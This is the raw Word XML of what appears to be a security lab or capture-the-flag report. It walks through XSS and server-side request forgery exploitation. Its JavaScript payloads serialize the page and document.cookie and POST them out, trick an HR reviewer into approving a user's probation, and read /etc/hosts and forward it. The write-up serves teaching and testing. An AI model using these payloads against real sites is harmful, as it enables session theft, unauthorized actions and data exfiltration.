        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="688"/>
        <w:gridCol w:w="5500"/>
        <w:gridCol w:w="2831"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B02622" w:rsidRPr="00EE51EF" w14:paraId="72A140B0" w14:textId="77777777" w:rsidTr="00B93ABC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="573"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480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3637"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B93ABC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="573" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3BA0E4" w14:textId="695AE4CD" w:rsidR="00EE51EF" w:rsidRDefault="00BA6F1D" w:rsidP="00EE51EF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>XMLSerializer</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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xhttp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> = new </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>XMLHttpRequest</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xhttp.open</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>("POST",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r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>dom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">=" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>serializer.serializeToString</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>(document)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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>document.cookie</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserv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 xml:space="preserve">=" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>JSON.stringify</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007D4321">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>(</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3637"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67FE043A" w:rsidR="004A69ED" w:rsidRDefault="005F1E95" w:rsidP="00311883">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16F510E5" wp14:editId="5DD08099">
                  <wp:extent cx="1638300" cy="7808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5991" cy="794005"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B02622" w14:paraId="2B1FBC67" w14:textId="77777777" w:rsidTr="00B93ABC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="573" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E861B0C" w14:textId="7B8B9242" w:rsidR="00A56C79" w:rsidRDefault="00A56C79" w:rsidP="00EE51EF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59C876EC" w14:textId="77777777" w:rsidR="00A56C79" w:rsidRPr="007D4321" w:rsidRDefault="00A56C79" w:rsidP="00353236">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3637"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77777777" w:rsidR="00A56C79" w:rsidRDefault="009E6F77" w:rsidP="00311883">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63B9977E" wp14:editId="112394C3">
                  <wp:extent cx="1666875" cy="5663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1741200" cy="591649"/>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16"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B93ABC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="573" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54A2ED64" w14:textId="132A9CB3" w:rsidR="00C13A2E" w:rsidRDefault="00C13A2E" w:rsidP="00EE51EF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4809" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3225B12A" w14:textId="55ADA2F9" w:rsidR="00C13A2E" w:rsidRDefault="00175C58" w:rsidP="00353236">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;!--</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> xss.html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lastRenderedPageBreak/>
              <w:t xml:space="preserve">  var </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FA023E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xhr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FA023E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">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xhr.onload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FA023E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">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this.responseText</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FA023E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w: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xhr.open</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FA023E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>("GET",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xhr.send</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FA023E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>();</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3637" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66938ADA" w14:textId="37354C69" w:rsidR="00C13A2E" w:rsidRDefault="002313B7" w:rsidP="00311883">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">njecting this payload as an anonymous question </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>will make the user “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xiandew</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>” pass the probation on behalf of the HR team member who reads the question and we have “Updated” as the response</w:t>
            </w:r>
            <w:r w:rsidR="00930E35">
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> instead</w:t>
            </w:r>
            <w:r>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02A1EF28">
                  <wp:extent cx="1679663" cy="435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5839" cy="450486"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C5842E7" w14:textId="5798120C" w:rsidR="002313B7" w:rsidRDefault="00B02622" w:rsidP="00311883">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>In the user profile page, we can see that the user successfully passed the probation and leaked out the sensitive information (in form of the flag)</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0281254E">
                  <wp:extent cx="1678189" cy="76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1702664" cy="778635"/>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6A7AB3"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2" w:name="_Exploitation_2"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xploitation 2</w:t>
      </w:r>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DD5C1A" w:rsidRPr="00FB55D4" w14:paraId="2F654462" w14:textId="77777777" w:rsidTr="00FB55D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="84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5166"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FB55D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AFD23E4" w14:textId="70D4876E" w:rsidR="00FB55D4" w:rsidRDefault="00FB55D4" w:rsidP="00FB55D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5166" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26B4261D" w14:textId="0CF29ED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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xhr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">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xhr.onload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>this.responseText</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w: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xhr.open</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>("GET",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xhr.send</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>();</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3007"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rFonts w:hint="eastAsia"/>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2DBA9C89">
                  <wp:extent cx="2128157" cy="110181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6280" cy="1137081"/>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2B846EC2" w:rsidR="0010484F" w:rsidRDefault="0010484F" w:rsidP="0010484F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ection 3 – Server-side request forgery exploitation walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D348FFF" w14:textId="64852D22" w:rsidR="00DD5C1A" w:rsidRDefault="00DD5C1A"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58216A" w:rsidRPr="00FB55D4" w14:paraId="36B6CC2C" w14:textId="77777777" w:rsidTr="004A3147">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846"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5166"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58216A" w14:paraId="1505C69C" w14:textId="77777777" w:rsidTr="004A3147">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DC381D6" w14:textId="77777777" w:rsidR="00DD5C1A" w:rsidRDefault="00DD5C1A" w:rsidP="004A3147">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5166" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7058BE04" w14:textId="77777777" w:rsidR="00DD5C1A" w:rsidRDefault="00DD5C1A" w:rsidP="004A3147">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>!--</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> ssrf_1.html --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="177E800A"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&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B02B85A"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var </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xhr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">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26741CA"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>xhr.onload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> = function () {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E53CE35"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var xhr2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01A8957"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7513B062"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xhr2.send("test=" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>this.responseText</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F62A161"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55D5D0CA"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xhr.open</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>("GET", "/etc/hosts");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06B7CB53" w14:textId="77777777" w:rsidR="00DD5C1A" w:rsidRPr="00A656A8" w:rsidRDefault="00DD5C1A" w:rsidP="004A3147">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xhr.send</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53FFDEE1" w14:textId="77777777" w:rsidR="00DD5C1A" w:rsidRDefault="00DD5C1A" w:rsidP="004A3147">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A656A8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3007" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A1652A1" w14:textId="77777777" w:rsidR="00DD5C1A" w:rsidRDefault="00DD5C1A" w:rsidP="004A3147">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="656CABC0" w14:textId="78ED551F" w:rsidR="00DD5C1A" w:rsidRDefault="0058216A" w:rsidP="004A3147">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43E78C02" wp14:editId="41C3D46C">
                  <wp:extent cx="2127013" cy="1101219"/>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stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2149725" cy="1112978"/>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1"/>
      <w:footerReference w:type="firs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4B13" w14:textId="77777777" w:rsidR="006A7AB3" w:rsidRDefault="006A7AB3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1E8C9974" w14:textId="77777777" w:rsidR="006A7AB3" w:rsidRDefault="006A7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8B89" w14:textId="77777777" w:rsidR="006A7AB3" w:rsidRDefault="006A7AB3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04115727" w14:textId="77777777" w:rsidR="006A7AB3" w:rsidRDefault="006A7A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10"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>
